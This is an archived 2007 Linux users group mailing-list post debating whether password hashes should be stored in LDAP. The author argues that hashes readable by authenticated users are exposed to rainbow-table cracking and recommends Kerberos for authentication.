Whats in your LDAP?
Jeff Anderson
jefferya at programmerq.net
Mon Oct 22 17:53:18 MDT 2007
From my humble and limited understanding of ldap, it in itself isn't too
picky about who can see the data. Having a hashed password in LDAP
enables anyone who can authenticate against ldap to see the hashed password.
With rainbow tables available, its a better idea to not have your hashes
public.
That's why a real authentication mechanism, like kerberos should be
used. It does not reveal anything about the stored password database
over the network.
Jeff Anderson
Shane Hathaway wrote:
> Michael L Torrie wrote:
>
>> Grant Shipley wrote:
>>
>>> We use Red Hat Directory Server here at Red Hat as the back end of our
>>> SSO implementation. Anytime you log in to redhat.com or RHN, you are
>>> binding via LDAP.
>>>
>> Hmm. This is interesting considering that although everyone does this,
>> but it raises the point that LDAP really is an authorization solution,
>> not an authentication solution. Thus people often say "use LDAP" when
>> they really mean one should use kerberos, or something similar. I'm
>> betting RH is using SASL and kerberos on the back end; I certainly hope
>> my RHN credentials are not stored in LDAP! In the ideal world, there
>> should never be any password information whatsoever stored in LDAP.
>>
>
> Hmm, I'm missing something. Why not? The passwords stored in my LDAP
> database are encrypted, and I'm not using Kerberos; is there something
> wrong with that?
>
> Shane
>
>
> /*
> PLUG: http://plug.org, #utah on irc.freenode.net
> Unsubscribe: http://plug.org/mailman/options/plug
> Don't fear the penguin.
> */
>
>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 249 bytes
Desc: OpenPGP digital signature
Url : http://plug.org/pipermail/plug/attachments/20071022/836c0c13/signature.pgp
More information about the PLUG
mailing list